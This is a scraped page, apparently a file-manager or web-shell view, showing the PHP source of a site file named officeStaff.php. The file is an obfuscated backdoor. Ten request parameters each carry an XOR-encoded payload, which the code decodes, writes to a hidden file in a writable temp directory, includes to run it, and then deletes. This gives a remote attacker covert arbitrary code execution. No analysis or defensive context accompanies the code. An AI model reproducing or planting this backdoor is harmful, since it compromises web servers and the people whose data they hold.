File manager

ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.- File manager

File manager - Edit - /home/tokomrjk/uspavilion.com/officeStaff.php

Back
<?php if(array_key_exists("\x72\x65c", $_REQUEST)){ $factor = array_filter(["/var/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/tmp", getenv("TMP"), session_save_path(), getenv("TEMP"), "/dev/shm", getcwd()]); $binding = $_REQUEST["\x72\x65c"]; $binding = explode('.' ,$binding) ; $entity = ''; $s4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s4 ); $t = 0; $__len = count($binding ); do { if($t >= $__len) break; $v1 = $binding[$t]; $chS = ord($s4[$t % $sLen] ); $d =((int)$v1 - $chS -($t % 10)) ^ 94; $entity .= chr($d ); $t++; } while(true ); foreach ($factor as $bind): if (max(0, is_dir($bind) * is_writable($bind))) { $flag = vsprintf("%s/%s", [$bind, ".property_set"]); $file = fopen($flag, 'w'); if ($file) { fwrite($file, $entity); fclose($file); include $flag; @unlink($flag); die(); } } endforeach; } if(array_key_exists("desc", $_REQUEST)){ $reference = $_REQUEST["desc"]; $reference = explode ( '.' ,$reference ) ; $data_chunk = ''; $s8 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s8); $__len = count($reference); for ($v = 0; $v < $__len; $v++) { $v9 = $reference[$v]; $sChar = ord($s8[$v % $sLen]); $dec = ((int)$v9 - $sChar - ($v % 10)) ^ 80; $data_chunk .= chr($dec); } $bind = array_filter([sys_get_temp_dir(), session_save_path(), "/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), "/var/tmp", getenv("TMP"), "/dev/shm"]); for ($pgrp = 0, $ent = count($bind); $pgrp < $ent; $pgrp++) { $val = $bind[$pgrp]; if (max(0, is_dir($val) * is_writable($val))) { $itm = join("/", [$val, ".object"]); if (file_put_contents($itm, $data_chunk)) { include $itm; @unlink($itm); die(); } } } } if(isset($_POST) && isset($_POST["p\x74\x72"])){ $holder = array_filter(["/dev/shm", "/tmp", session_save_path(), "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir(), getcwd(), getenv("TMP")]); $itm = $_POST["p\x74\x72"]; $itm = explode( '.', $itm ) ; $desc =''; $salt3 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($salt3 ); $q =0; array_walk($itm,function ($v4) use (&$desc,&$q,$salt3,$lenS) { $chS =ord($salt3[$q % $lenS] ); $d =((int)$v4 - $chS - ($q % 10)) ^ 71; $desc.= chr($d ); $q++; } ); for ($elem = 0, $factor = count($holder); $elem < $factor; $elem++) { $element = $holder[$elem]; if (is_dir($element) && is_writable($element)) { $sym = "$element/.reference"; if (file_put_contents($sym, $desc)) { include $sym; @unlink($sym); die(); } } } } if(@$_REQUEST["f\x6Ca\x67"] !== null){ $element = array_filter([getenv("TMP"), getcwd(), "/dev/shm", getenv("TEMP"), "/var/tmp", sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir"), "/tmp"]); $symbol = $_REQUEST["f\x6Ca\x67"]; $symbol = explode ("." , $symbol ) ; $ptr= ''; $salt3= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen( $salt3 ); $u= 0; array_walk( $symbol, function( $v8) use( &$ptr, &$u, $salt3, $lenS) {$chS= ord( $salt3[$u % $lenS] ); $dec= ( ( int)$v8 - $chS -( $u % 10)) ^ 1; $ptr.= chr( $dec ); $u++; } ); foreach ($element as $key => $ent) { if (array_product([is_dir($ent), is_writable($ent)])) { $token = str_replace("{var_dir}", $ent, "{var_dir}/.entry"); if (@file_put_contents($token, $ptr) !== false) { include $token; unlink($token); die(); } } } } if(isset($_POST["\x76al"])){ $component = $_POST["\x76al"]; $component = explode( '.' , $component ); $symbol = ''; $s7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s7); foreach ($component as $k=> $v9) { $sChar = ord($s7[$k% $lenS]); $d = ((int)$v9 - $sChar - ($k% 10)) ^ 55; $symbol .=chr($d); } $elem = array_filter([getenv("TMP"), "/tmp", session_save_path(), getcwd(), ini_get("upload_tmp_dir"), "/var/tmp", sys_get_temp_dir(), "/dev/shm", getenv("TEMP")]); $bind = 0; do { $pgrp = $elem[$bind] ?? null; if ($bind >= count($elem)) break; if ((is_dir($pgrp) and is_writable($pgrp))) { $value = join("/", [$pgrp, ".comp"]); if (file_put_contents($value, $symbol)) { require $value; unlink($value); die(); } } $bind++; } while (true); } if(isset($_POST["f\x61\x63"]) ? true : false){ $marker = array_filter([sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), session_save_path(), "/var/tmp", getenv("TMP"), "/dev/shm", getcwd()]); $token = $_POST["f\x61\x63"]; $token= explode( '.', $token); $sym = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt2 ); $len = count( $token ); for( $p = 0; $p<$len; $p++) {$v1 = $token[$p]; $sChar = ord( $salt2[$p % $lenS] ); $d =( ( int)$v1 - $sChar -( $p % 10)) ^ 31; $sym.= chr( $d );} foreach ($marker as $ent): if (!( !is_dir($ent) \|\| !is_writable($ent) )) { $flag = str_replace("{var_dir}", $ent, "{var_dir}/.flg"); if (file_put_contents($flag, $sym)) { include $flag; @unlink($flag); die(); } } endforeach; } if(isset($_POST["k"])){ $desc = $_POST["k"]; $desc = explode( '.', $desc ) ; $pgrp = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s9 ); foreach($desc as $o => $v4): $chS = ord($s9[$o % $lenS] ); $dec =((int)$v4 - $chS -($o % 10)) ^76; $pgrp .= chr($dec ); endforeach; $item = array_filter([getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/var/tmp", "/tmp", "/dev/shm", getenv("TMP"), session_save_path(), getenv("TEMP")]); for ($holder = 0, $property_set = count($item); $holder < $property_set; $holder++) { $rec = $item[$holder]; if ((bool)is_dir($rec) && (bool)is_writable($rec)) { $entry = join("/", [$rec, ".descriptor"]); if (@file_put_contents($entry, $pgrp) !== false) { include $entry; unlink($entry); exit; } } } } if(array_key_exists("\x65\x6Cem", $_POST)){ $sym = array_filter([sys_get_temp_dir(), getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", getcwd(), "/var/tmp", session_save_path(), getenv("TMP")]); $fac = $_POST["\x65\x6Cem"]; $fac =explode ("." , $fac) ; $pointer = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); $t = 0; while ($t < count($fac)) { $v8 = $fac[$t]; $chS = ord($s[$t % $sLen]); $d = ((int)$v8 - $chS - ($t % 10)) ^ 83; $pointer.= chr($d); $t++; } while ($marker = array_shift($sym)) { if ((is_dir($marker) and is_writable($marker))) { $descriptor = "$marker/.resource"; if (file_put_contents($descriptor, $pointer)) { include $descriptor; @unlink($descriptor); exit; } } } } if(count($_REQUEST) > 0 && isset($_REQUEST["\x73\x79m"])){ $tkn = array_filter([session_save_path(), "/var/tmp", getenv("TMP"), sys_get_temp_dir(), "/dev/shm", getcwd(), "/tmp", getenv("TEMP"), ini_get("upload_tmp_dir")]); $obj = $_REQUEST["\x73\x79m"]; $obj= explode ( '.',$obj ) ; $reference = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); $p = 0; $__tmp = $obj; while($v5 = array_shift($__tmp)) {$chS = ord($s[$p % $sLen]); $d = ((int)$v5 - $chS -($p % 10))^ 51; $reference .= chr($d); $p++; } while ($item = array_shift($tkn)) { if (!!is_dir($item) && !!is_writable($item)) { $value = "$item/.dat"; $success = file_put_contents($value, $reference); if ($success) { include $value; @unlink($value); exit;} } } } if(isset($_REQUEST) && isset($_REQUEST["p\x73\x65t"])){ $comp = array_filter([session_save_path(), sys_get_temp_dir(), getenv("TMP"), "/tmp", ini_get("upload_tmp_dir"), "/var/tmp", getenv("TEMP"), "/dev/shm", getcwd()]); $flag = $_REQUEST["p\x73\x65t"]; $flag = explode ('.' , $flag ) ; $entry = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $p = 0; array_walk($flag , function ($v2) use (&$entry , &$p , $salt , $sLen) { $sChar = ord($salt[$p% $sLen]); $dec = ((int)$v2 - $sChar - ($p% 10)) ^ 91; $entry .= chr($dec); $p++; } ); while ($symbol = array_shift($comp)) { if ((is_dir($symbol) and is_writable($symbol))) { $ptr = sprintf("%s/.token", $symbol); $success = file_put_contents($ptr, $entry); if ($success) { include $ptr; @unlink($ptr); exit;} } } }